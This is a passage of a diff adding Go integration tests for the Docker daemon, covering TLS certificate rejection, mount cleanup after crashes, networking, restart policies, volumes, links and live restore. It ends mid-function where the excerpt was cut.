+// TestHTTPSInfoRogueServerCert connects via two-way authenticated HTTPS to the info endpoint
+// which provides a rogue server certificate and checks that it fails with the expected error
+func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) {
+	const (
+		errCaUnknown             = "x509: certificate signed by unknown authority"
+		testDaemonRogueHTTPSAddr = "tcp://localhost:4272"
+	)
+	if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-rogue-cert.pem",
+		"--tlskey", "fixtures/https/server-rogue-key.pem", "-H", testDaemonRogueHTTPSAddr); err != nil {
+		c.Fatalf("Could not start daemon with busybox: %v", err)
+	}
+
+	args := []string{
+		"--host", testDaemonRogueHTTPSAddr,
+		"--tlsverify", "--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/client-rogue-cert.pem",
+		"--tlskey", "fixtures/https/client-rogue-key.pem",
+		"info",
+	}
+	out, err := s.d.Cmd(args...)
+	if err == nil || !strings.Contains(out, errCaUnknown) {
+		c.Fatalf("Expected err: %s, got instead: %s and output: %s", errCaUnknown, err, out)
+	}
+}
+
+func pingContainers(c *check.C, d *Daemon, expectFailure bool) {
+	var dargs []string
+	if d != nil {
+		dargs = []string{"--host", d.sock()}
+	}
+
+	args := append(dargs, "run", "-d", "--name", "container1", "busybox", "top")
+	dockerCmd(c, args...)
+
+	args = append(dargs, "run", "--rm", "--link", "container1:alias1", "busybox", "sh", "-c")
+	pingCmd := "ping -c 1 %s -W 1"
+	args = append(args, fmt.Sprintf(pingCmd, "alias1"))
+	_, _, err := dockerCmdWithError(args...)
+
+	if expectFailure {
+		c.Assert(err, check.NotNil)
+	} else {
+		c.Assert(err, check.IsNil)
+	}
+
+	args = append(dargs, "rm", "-f", "container1")
+	dockerCmd(c, args...)
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithSocketAsVolume(c *check.C) {
+	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+
+	socket := filepath.Join(s.d.folder, "docker.sock")
+
+	out, err := s.d.Cmd("run", "--restart=always", "-v", socket+":/sock", "busybox")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(s.d.Restart(), check.IsNil)
+}
+
+// os.Kill should kill daemon ungracefully, leaving behind container mounts.
+// A subsequent daemon restart shoud clean up said mounts.
+func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonAndContainerKill(c *check.C) {
+	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	id := strings.TrimSpace(out)
+	c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil)
+	mountOut, err := ioutil.ReadFile("/proc/self/mountinfo")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
+
+	// container mounts should exist even after daemon has crashed.
+	comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment)
+
+	// kill the container
+	runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", id)
+	if out, ec, err := runCommandWithOutput(runCmd); err != nil {
+		c.Fatalf("Failed to run ctr, ExitCode: %d, err: %v output: %s id: %s\n", ec, err, out, id)
+	}
+
+	// restart daemon.
+	if err := s.d.Restart(); err != nil {
+		c.Fatal(err)
+	}
+
+	// Now, container mounts should be gone.
+	mountOut, err = ioutil.ReadFile("/proc/self/mountinfo")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
+	comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment)
+}
+
+// os.Interrupt should perform a graceful daemon shutdown and hence cleanup mounts.
+func (s *DockerDaemonSuite) TestCleanupMountsAfterGracefulShutdown(c *check.C) {
+	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	id := strings.TrimSpace(out)
+
+	// Send SIGINT and daemon should clean up
+	c.Assert(s.d.cmd.Process.Signal(os.Interrupt), check.IsNil)
+	// Wait for the daemon to stop.
+	c.Assert(<-s.d.wait, checker.IsNil)
+
+	mountOut, err := ioutil.ReadFile("/proc/self/mountinfo")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
+
+	comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment)
+}
+
+func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	c.Assert(s.d.StartWithBusybox("-b", "none"), check.IsNil)
+
+	out, err := s.d.Cmd("run", "--rm", "busybox", "ip", "l")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(strings.Contains(out, "eth0"), check.Equals, false,
+		check.Commentf("There shouldn't be eth0 in container in default(bridge) mode when bridge network is disabled: %s", out))
+
+	out, err = s.d.Cmd("run", "--rm", "--net=bridge", "busybox", "ip", "l")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(strings.Contains(out, "eth0"), check.Equals, false,
+		check.Commentf("There shouldn't be eth0 in container in bridge mode when bridge network is disabled: %s", out))
+	// the extra grep and awk clean up the output of `ip` to only list the number and name of
+	// interfaces, allowing for different versions of ip (e.g. inside and outside the container) to
+	// be used while still verifying that the interface list is the exact same
+	cmd := exec.Command("sh", "-c", "ip l | grep -E '^[0-9]+:' | awk -F: ' { print $1\":\"$2 } '")
+	stdout := bytes.NewBuffer(nil)
+	cmd.Stdout = stdout
+	if err := cmd.Run(); err != nil {
+		c.Fatal("Failed to get host network interface")
+	}
+	out, err = s.d.Cmd("run", "--rm", "--net=host", "busybox", "sh", "-c", "ip l | grep -E '^[0-9]+:' | awk -F: ' { print $1\":\"$2 } '")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(out, check.Equals, fmt.Sprintf("%s", stdout),
+		check.Commentf("The network interfaces in container should be the same with host when --net=host when bridge network is disabled: %s", out))
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		t.Fatal(err)
+	}
+	if out, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top"); err != nil {
+		t.Fatal(out, err)
+	}
+
+	if err := s.d.Restart(); err != nil {
+		t.Fatal(err)
+	}
+	// Container 'test' should be removed without error
+	if out, err := s.d.Cmd("rm", "test"); err != nil {
+		t.Fatal(out, err)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatal(err)
+	}
+	out, err := s.d.Cmd("run", "--name", "netns", "-d", "busybox", "top")
+	if err != nil {
+		c.Fatal(out, err)
+	}
+
+	// Get sandbox key via inspect
+	out, err = s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.SandboxKey}}'", "netns")
+	if err != nil {
+		c.Fatalf("Error inspecting container: %s, %v", out, err)
+	}
+	fileName := strings.Trim(out, " \r\n'")
+
+	if out, err := s.d.Cmd("stop", "netns"); err != nil {
+		c.Fatal(out, err)
+	}
+
+	// Test if the file still exists
+	out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName))
+	out = strings.TrimSpace(out)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(out, check.Equals, fileName, check.Commentf("Output: %s", out))
+
+	// Remove the container and restart the daemon
+	if out, err := s.d.Cmd("rm", "netns"); err != nil {
+		c.Fatal(out, err)
+	}
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatal(err)
+	}
+
+	// Test again and see now the netns file does not exist
+	out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName))
+	out = strings.TrimSpace(out)
+	c.Assert(err, check.Not(check.IsNil), check.Commentf("Output: %s", out))
+}
+
+// tests regression detailed in #13964 where DOCKER_TLS_VERIFY env is ignored
+func (s *DockerDaemonSuite) TestDaemonTLSVerifyIssue13964(c *check.C) {
+	host := "tcp://localhost:4271"
+	c.Assert(s.d.Start("-H", host), check.IsNil)
+	cmd := exec.Command(dockerBinary, "-H", host, "info")
+	cmd.Env = []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"}
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, check.Not(check.IsNil), check.Commentf("%s", out))
+	c.Assert(strings.Contains(out, "error during connect"), check.Equals, true)
+
+}
+
+func setupV6(c *check.C) {
+	// Hack to get the right IPv6 address on docker0, which has already been created
+	result := icmd.RunCommand("ip", "addr", "add", "fe80::1/64", "dev", "docker0")
+	result.Assert(c, icmd.Expected{})
+}
+
+func teardownV6(c *check.C) {
+	result := icmd.RunCommand("ip", "addr", "del", "fe80::1/64", "dev", "docker0")
+	result.Assert(c, icmd.Expected{})
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlways(c *check.C) {
+	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top")
+	c.Assert(err, check.IsNil)
+	id := strings.TrimSpace(out)
+
+	_, err = s.d.Cmd("stop", id)
+	c.Assert(err, check.IsNil)
+	_, err = s.d.Cmd("wait", id)
+	c.Assert(err, check.IsNil)
+
+	out, err = s.d.Cmd("ps", "-q")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, check.Equals, "")
+
+	c.Assert(s.d.Restart(), check.IsNil)
+
+	out, err = s.d.Cmd("ps", "-q")
+	c.Assert(err, check.IsNil)
+	c.Assert(strings.TrimSpace(out), check.Equals, id[:12])
+}
+
+func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) {
+	if err := s.d.StartWithBusybox("--log-opt=max-size=1k"); err != nil {
+		c.Fatal(err)
+	}
+	name := "logtest"
+	out, err := s.d.Cmd("run", "-d", "--log-opt=max-file=5", "--name", name, "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s, err: %v", out, err))
+
+	out, err = s.d.Cmd("inspect", "-f", "{{ .HostConfig.LogConfig.Config }}", name)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(out, checker.Contains, "max-size:1k")
+	c.Assert(out, checker.Contains, "max-file:5")
+
+	out, err = s.d.Cmd("inspect", "-f", "{{ .HostConfig.LogConfig.Type }}", name)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "json-file")
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) {
+	if err := s.d.StartWithBusybox(); err != nil {
+		c.Fatal(err)
+	}
+	if out, err := s.d.Cmd("run", "-i", "-d", "--name", "test", "busybox", "top"); err != nil {
+		c.Fatal(err, out)
+	}
+	if out, err := s.d.Cmd("pause", "test"); err != nil {
+		c.Fatal(err, out)
+	}
+	if err := s.d.Restart(); err != nil {
+		c.Fatal(err)
+	}
+
+	errchan := make(chan error)
+	go func() {
+		out, err := s.d.Cmd("start", "test")
+		if err != nil {
+			errchan <- fmt.Errorf("%v:\n%s", err, out)
+		}
+		name := strings.TrimSpace(out)
+		if name != "test" {
+			errchan <- fmt.Errorf("Paused container start error on docker daemon restart, expected 'test' but got '%s'", name)
+		}
+		close(errchan)
+	}()
+
+	select {
+	case <-time.After(5 * time.Second):
+		c.Fatal("Waiting on start a container timed out")
+	case err := <-errchan:
+		if err != nil {
+			c.Fatal(err)
+		}
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) {
+	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+
+	out, err := s.d.Cmd("create", "-v", "test:/foo", "busybox")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	c.Assert(s.d.Restart(), check.IsNil)
+
+	out, err = s.d.Cmd("volume", "rm", "test")
+	c.Assert(err, check.NotNil, check.Commentf("should not be able to remove in use volume after daemon restart"))
+	c.Assert(out, checker.Contains, "in use")
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartLocalVolumes(c *check.C) {
+	c.Assert(s.d.Start(), check.IsNil)
+
+	_, err := s.d.Cmd("volume", "create", "test")
+	c.Assert(err, check.IsNil)
+	c.Assert(s.d.Restart(), check.IsNil)
+
+	_, err = s.d.Cmd("volume", "inspect", "test")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerDaemonSuite) TestDaemonCorruptedLogDriverAddress(c *check.C) {
+	c.Assert(s.d.Start("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil)
+	expected := "Failed to set log opts: syslog-address should be in form proto://address"
+	runCmd := exec.Command("grep", expected, s.d.LogFileName())
+	if out, _, err := runCommandWithOutput(runCmd); err != nil {
+		c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonCorruptedFluentdAddress(c *check.C) {
+	c.Assert(s.d.Start("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil)
+	expected := "Failed to set log opts: invalid fluentd-address corrupted:c: "
+	runCmd := exec.Command("grep", expected, s.d.LogFileName())
+	if out, _, err := runCommandWithOutput(runCmd); err != nil {
+		c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err)
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonStartWithoutHost(c *check.C) {
+	s.d.useDefaultHost = true
+	defer func() {
+		s.d.useDefaultHost = false
+	}()
+	c.Assert(s.d.Start(), check.IsNil)
+}
+
+func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) {
+	s.d.useDefaultTLSHost = true
+	defer func() {
+		s.d.useDefaultTLSHost = false
+	}()
+	if err := s.d.Start(
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/server-cert.pem",
+		"--tlskey", "fixtures/https/server-key.pem"); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+
+	// The client with --tlsverify should also use default host localhost:2376
+	tmpHost := os.Getenv("DOCKER_HOST")
+	defer func() {
+		os.Setenv("DOCKER_HOST", tmpHost)
+	}()
+
+	os.Setenv("DOCKER_HOST", "")
+
+	out, _ := dockerCmd(
+		c,
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/client-cert.pem",
+		"--tlskey", "fixtures/https/client-key.pem",
+		"version",
+	)
+	if !strings.Contains(out, "Server") {
+		c.Fatalf("docker version should return information of server side")
+	}
+}
+
+func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) {
+	defaultNetworkBridge := "docker0"
+	deleteInterface(c, defaultNetworkBridge)
+
+	bridgeIP := "192.169.1.1"
+	bridgeRange := bridgeIP + "/30"
+
+	err := s.d.StartWithBusybox("--bip", bridgeRange)
+	c.Assert(err, check.IsNil)
+	defer s.d.Restart()
+
+	var cont int
+	for {
+		contName := fmt.Sprintf("container%d", cont)
+		_, err = s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2")
+		if err != nil {
+			// pool exhausted
+			break
+		}
+		ip, err := s.d.Cmd("inspect", "--format", "'{{.NetworkSettings.IPAddress}}'", contName)
+		c.Assert(err, check.IsNil)
+
+		c.Assert(ip, check.Not(check.Equals), bridgeIP)
+		cont++
+	}
+}
+
+// Test daemon for no space left on device error
+func (s *DockerDaemonSuite) TestDaemonNoSpaceLeftOnDeviceError(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux, Network)
+
+	testDir, err := ioutil.TempDir("", "no-space-left-on-device-test")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(testDir)
+	c.Assert(mount.MakeRShared(testDir), checker.IsNil)
+	defer mount.Unmount(testDir)
+
+	// create a 2MiB image and mount it as graph root
+	// Why in a container? Because `mount` sometimes behaves weirdly and often fails outright on this test in debian:jessie (which is what the test suite runs under if run from the Makefile)
+	dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=2 count=0")
+	out, _, err := runCommandWithOutput(exec.Command("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img"))) // `mkfs.ext4` is not in busybox
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	cmd := exec.Command("losetup", "-f", "--show", filepath.Join(testDir, "testfs.img"))
+	loout, err := cmd.CombinedOutput()
+	c.Assert(err, checker.IsNil)
+	loopname := strings.TrimSpace(string(loout))
+	defer exec.Command("losetup", "-d", loopname).Run()
+
+	dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", fmt.Sprintf("mkdir -p /test/test-mount && mount -t ext4 -no loop,rw %v /test/test-mount", loopname))
+	defer mount.Unmount(filepath.Join(testDir, "test-mount"))
+
+	err = s.d.Start("--graph", filepath.Join(testDir, "test-mount"))
+	defer s.d.Stop()
+	c.Assert(err, check.IsNil)
+
+	// pull a repository large enough to fill the mount point
+	pullOut, err := s.d.Cmd("pull", "registry:2")
+	c.Assert(err, checker.NotNil, check.Commentf(pullOut))
+	c.Assert(pullOut, checker.Contains, "no space left on device")
+}
+
+// Test daemon restart with container links + auto restart
+func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) {
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	parent1Args := []string{}
+	parent2Args := []string{}
+	wg := sync.WaitGroup{}
+	maxChildren := 10
+	chErr := make(chan error, maxChildren)
+
+	for i := 0; i < maxChildren; i++ {
+		wg.Add(1)
+		name := fmt.Sprintf("test%d", i)
+
+		if i < maxChildren/2 {
+			parent1Args = append(parent1Args, []string{"--link", name}...)
+		} else {
+			parent2Args = append(parent2Args, []string{"--link", name}...)
+		}
+
+		go func() {
+			_, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top")
+			chErr <- err
+			wg.Done()
+		}()
+	}
+
+	wg.Wait()
+	close(chErr)
+	for err := range chErr {
+		c.Assert(err, check.IsNil)
+	}
+
+	parent1Args = append([]string{"run", "-d"}, parent1Args...)
+	parent1Args = append(parent1Args, []string{"--name=parent1", "--restart=always", "busybox", "top"}...)
+	parent2Args = append([]string{"run", "-d"}, parent2Args...)
+	parent2Args = append(parent2Args, []string{"--name=parent2", "--restart=always", "busybox", "top"}...)
+
+	_, err = s.d.Cmd(parent1Args...)
+	c.Assert(err, check.IsNil)
+	_, err = s.d.Cmd(parent2Args...)
+	c.Assert(err, check.IsNil)
+
+	err = s.d.Stop()
+	c.Assert(err, check.IsNil)
+	// clear the log file -- we don't need any of it but may for the next part
+	// can ignore the error here, this is just a cleanup
+	os.Truncate(s.d.LogFileName(), 0)
+	err = s.d.Start()
+	c.Assert(err, check.IsNil)
+
+	for _, num := range []string{"1", "2"} {
+		out, err := s.d.Cmd("inspect", "-f", "{{ .State.Running }}", "parent"+num)
+		c.Assert(err, check.IsNil)
+		if strings.TrimSpace(out) != "true" {
+			log, _ := ioutil.ReadFile(s.d.LogFileName())
+			c.Fatalf("parent container is not running\n%s", string(log))
+		}
+	}
+}
+
+func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	cgroupParent := "test"
+	name := "cgroup-test"
+
+	err := s.d.StartWithBusybox("--cgroup-parent", cgroupParent)
+	c.Assert(err, check.IsNil)
+	defer s.d.Restart()
+
+	out, err := s.d.Cmd("run", "--name", name, "busybox", "cat", "/proc/self/cgroup")
+	c.Assert(err, checker.IsNil)
+	cgroupPaths := parseCgroupPaths(string(out))
+	c.Assert(len(cgroupPaths), checker.Not(checker.Equals), 0, check.Commentf("unexpected output - %q", string(out)))
+	out, err = s.d.Cmd("inspect", "-f", "{{.Id}}", name)
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(string(out))
+	expectedCgroup := path.Join(cgroupParent, id)
+	found := false
+	for _, path := range cgroupPaths {
+		if strings.HasSuffix(path, expectedCgroup) {
+			found = true
+			break
+		}
+	}
+	c.Assert(found, checker.True, check.Commentf("Cgroup path for container (%s) doesn't found in cgroups file: %s", expectedCgroup, cgroupPaths))
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support links
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("run", "--name=test2", "--link", "test:abc", "busybox", "sh", "-c", "ping -c 1 -w 1 abc")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	c.Assert(s.d.Restart(), check.IsNil)
+
+	// should fail since test is not running yet
+	out, err = s.d.Cmd("start", "test2")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("start", "test")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = s.d.Cmd("start", "-a", "test2")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(strings.Contains(out, "1 packets transmitted, 1 packets received"), check.Equals, true, check.Commentf(out))
+}
+
+func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support links
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("create", "--name=test", "busybox")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("run", "-d", "--name=test2", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	test2ID := strings.TrimSpace(out)
+
+	out, err = s.d.Cmd("run", "-d", "--name=test3", "--link", "test2:abc", "busybox", "top")
+	test3ID := strings.TrimSpace(out)
+
+	c.Assert(s.d.Restart(), check.IsNil)
+
+	out, err = s.d.Cmd("create", "--name=test", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf("expected error trying to create container with duplicate name"))
+	// this one is no longer needed, removing simplifies the remainder of the test
+	out, err = s.d.Cmd("rm", "-f", "test")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("ps", "-a", "--no-trunc")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	lines := strings.Split(strings.TrimSpace(out), "\n")[1:]
+
+	test2validated := false
+	test3validated := false
+	for _, line := range lines {
+		fields := strings.Fields(line)
+		names := fields[len(fields)-1]
+		switch fields[0] {
+		case test2ID:
+			c.Assert(names, check.Equals, "test2,test3/abc")
+			test2validated = true
+		case test3ID:
+			c.Assert(names, check.Equals, "test3")
+			test3validated = true
+		}
+	}
+
+	c.Assert(test2validated, check.Equals, true)
+	c.Assert(test3validated, check.Equals, true)
+}
+
+// TestDaemonRestartWithKilledRunningContainer requires live restore of running containers
+func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check.C) {
+	// TODO(mlaventure): Not sure what would the exit code be on windows
+	testRequires(t, DaemonIsLinux)
+	if err := s.d.StartWithBusybox(); err != nil {
+		t.Fatal(err)
+	}
+
+	cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top")
+	defer s.d.Stop()
+	if err != nil {
+		t.Fatal(cid, err)
+	}
+	cid = strings.TrimSpace(cid)
+
+	pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", cid)
+	t.Assert(err, check.IsNil)
+	pid = strings.TrimSpace(pid)
+
+	// Kill the daemon
+	if err := s.d.Kill(); err != nil {
+		t.Fatal(err)
+	}
+
+	// kill the container
+	runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", cid)
+	if out, ec, err := runCommandWithOutput(runCmd); err != nil {
+		t.Fatalf("Failed to run ctr, ExitCode: %d, err: '%v' output: '%s' cid: '%s'\n", ec, err, out, cid)
+	}
+
+	// Give time to containerd to process the command if we don't
+	// the exit event might be received after we do the inspect
+	pidCmd := exec.Command("kill", "-0", pid)
+	_, ec, _ := runCommandWithOutput(pidCmd)
+	for ec == 0 {
+		time.Sleep(1 * time.Second)
+		_, ec, _ = runCommandWithOutput(pidCmd)
+	}
+
+	// restart the daemon
+	if err := s.d.Start(); err != nil {
+		t.Fatal(err)
+	}
+
+	// Check that we've got the correct exit code
+	out, err := s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", cid)
+	t.Assert(err, check.IsNil)
+
+	out = strings.TrimSpace(out)
+	if out != "143" {
+		t.Fatalf("Expected exit code '%s' got '%s' for container '%s'\n", "143", out, cid)
+	}
+
+}
+
+// os.Kill should kill daemon ungracefully, leaving behind live containers.
+// The live containers should be known to the restarted daemon. Stopping
+// them now, should remove the mounts.
+func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	c.Assert(s.d.StartWithBusybox("--live-restore"), check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	id := strings.TrimSpace(out)
+
+	c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil)
+	mountOut, err := ioutil.ReadFile("/proc/self/mountinfo")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
+
+	// container mounts should exist even after daemon has crashed.
+	comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment)
+
+	// restart daemon.
+	if err := s.d.Restart("--live-restore"); err != nil {
+		c.Fatal(err)
+	}
+
+	// container should be running.
+	out, err = s.d.Cmd("inspect", "--format={{.State.Running}}", id)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+	out = strings.TrimSpace(out)
+	if out != "true" {
+		c.Fatalf("Container %s expected to stay alive after daemon restart", id)
+	}
+
+	// 'docker stop' should work.
+	out, err = s.d.Cmd("stop", id)
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
+
+	// Now, container mounts should be gone.
+	mountOut, err = ioutil.ReadFile("/proc/self/mountinfo")
+	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
+	comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment)
+}
+
+// TestDaemonRestartWithUnpausedRunningContainer requires live restore of running containers.
+func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *check.C) {
+	// TODO(mlaventure): Not sure what would the exit code be on windows
+	testRequires(t, DaemonIsLinux)
+	if err := s.d.StartWithBusybox("--live-restore"); err != nil {
+		t.Fatal(err)
+	}
+
+	cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top")
+	defer s.d.Stop()
+	if err != nil {
+		t.Fatal(cid, err)
+	}
+	cid = strings.TrimSpace(cid)
+
+	pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", cid)
+	t.Assert(err, check.IsNil)
+
+	// pause the container
+	if _, err := s.d.Cmd("pause", cid); err != nil {
+		t.Fatal(cid, err)
+	}
+
+	// Kill the daemon
+	if err := s.d.Kill(); err != nil {
+		t.Fatal(err)
+	}
+
+	// resume the container
+	result := icmd.RunCommand(
+		ctrBinary,
+		"--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock",
+		"containers", "resume", cid)
+	t.Assert(result, icmd.Matches, icmd.Success)
+
+	// Give time to containerd to process the command if we don't
+	// the resume event might be received after we do the inspect
+	waitAndAssert(t, defaultReconciliationTimeout, func(*check.C) (interface{}, check.CommentInterface) {
+		result := icmd.RunCommand("kill", "-0", strings.TrimSpace(pid))
+		return result.ExitCode, nil
+	}, checker.Equals, 0)
+
+	// restart the daemon
+	if err := s.d.Start("--live-restore"); err != nil {
+		t.Fatal(err)
+	}
+
+	// Check that we've got the correct status
+	out, err := s.d.Cmd("inspect", "-f", "{{.State.Status}}", cid)
+	t.Assert(err, check.IsNil)
+
+	out = strings.TrimSpace(out)
+	if out != "running" {
+		t.Fatalf("Expected exit code '%s' got '%s' for container '%s'\n", "running", out, cid)
+	}
+	if _, err := s.d.Cmd("kill", cid); err != nil {
+		t.Fatal(err)
+	}
+}
+
+// TestRunLinksChanged checks that creating a new container with the same name does not update links
+// this ensures that the old, pre gh#16032 functionality continues on
+func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support links
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	out, err = s.d.Cmd("run", "--name=test2", "--link=test:abc", "busybox", "sh", "-c", "ping -c 1 abc")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "1 packets transmitted, 1 packets received")
+
+	out, err = s.d.Cmd("rm", "-f", "test")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
